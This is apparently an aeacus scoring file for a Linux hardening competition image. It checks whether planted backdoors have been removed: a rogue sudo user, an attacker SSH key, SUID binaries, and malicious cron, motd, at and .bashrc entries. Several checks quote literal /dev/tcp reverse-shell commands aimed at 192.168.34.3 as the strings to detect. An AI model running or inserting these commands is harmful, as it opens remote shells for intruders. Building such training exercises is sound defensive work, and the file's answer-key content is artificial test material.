name = "ubnt"            # Image name
title = "Joe's Revenge" # Round title
os = "Ubuntu 22.04.3 LTS"                     # OS, used for README
user = "user"                       # Main user for the image
 
# Set the aeacus version of this scoring file. Set this to the version
# of aeacus you are using. This is used to make sure your configuration,
# if re-used, is compatible with the version of aeacus being used.
#
# You can print your version of aeacus with ./aeacus version.
version = "2.1.1"
 
[[check]]
message = "Removed unauthorized admin sloppyjoe"
 
	[[check.pass]]
	type="UserExistsNot"
	user="sloppyjoe"
 
[[check]]
message = "Unauthorized user sloppyjoe belongs to sudo group"
 
	[[check.pass]]
	type = "UserInGroupNot"
	user = "sloppyjoe"
	group = "sudo"
 
 
[[check]]
message = "Service 'Super-Important-Network-Name-Resolution-Please-No-Delete' is running"
 
	[[check.pass]]
	type = "ServiceUp"
	name = "Super-Important-Network-Name-Resolution-Please-No-Delete"
 
[[check]]
message = "SSH authorized_keys file exists"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/home/user/.ssh/authorized_keys"
 
[[check]]
message = "SSH key 'hacker@getpwned.com' found in authorized_keys"
 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/home/user/.ssh/authorized_keys"
	value = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDubTGnY3TWk4ycUJg9E+VpkjCp1hcim4XdVioWtTUOf hacker@getpwned.com"
 
[[check]]
message = "Evil cron job found in /etc/cron.d (reverse shell on port 4448)"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/etc/cron.d/evil_cron_job"
 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/etc/cron.d/evil_cron_job"
	value = "/bin/bash -c 'sh -i >& /dev/tcp/192.168.34.3/4448 0>&1'"
 
[[check]]
message = "Evil cron job found in /etc/cron.daily (reverse shell on port 4447)"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/etc/cron.daily/evil_cron_job"
 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/etc/cron.daily/evil_cron_job"
	value = "/bin/bash -c 'sh -i >& /dev/tcp/192.168.34.3/4447 0>&1'"
 
[[check]]
message = "Evil cron job found in /etc/crontab (reverse shell on port 4449)"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/etc/crontab"
 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/etc/crontab"
	value = "/bin/bash -c 'sh -i >& /dev/tcp/192.168.34.3/4449 0>&1'"
 
[[check]]
message = "Insecure python upgrade message found in /etc/update-motd.d (reverse shell on port 4450)"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/etc/update-motd.d/137-python-upgrades"
 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/etc/update-motd.d/137-python-upgrades"
	value = "nohup setsid bash -c 'bash -i >& /dev/tcp/192.168.34.3/4450 0>&1'"
 
[[check]]
message = "Private SSH keys found for user"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/home/user/.ssh/id_rsa1822"
 
	[[check.pass]]
	type = "PathExistsNot"
	path = "/home/user/.ssh/id_rsa1822.pub"
 
[[check]]
message = "SUID permission found on /bin/find"
 
	[[check.pass]]
	type = "PermissionIsNot"
	path = "/bin/find"
	value = "???s?????"
 
[[check]]
message = "SUID permission found on /bin/dash"
 
	[[check.pass]]
	type = "PermissionIsNot"
	path = "/bin/dash"
	value = "???s?????"
 
[[check]]
message = "Malicious function 'update_totally_innocent' not found in .bashrc"

 
	[[check.pass]]
	type = "FileContainsNot"
	path = "/home/user/.bashrc"
	value = "function update_totally_innocent"
 
[[check]]
message = "Malicious AT job found (check for malicious AT job scheduled)"
 
	[[check.pass]]
	type = "DirContainsNot"
	path = "/var/spool/cron/atjobs/"
	value = "/bin/bash -c 'sh -i >& /dev/tcp/'"
 
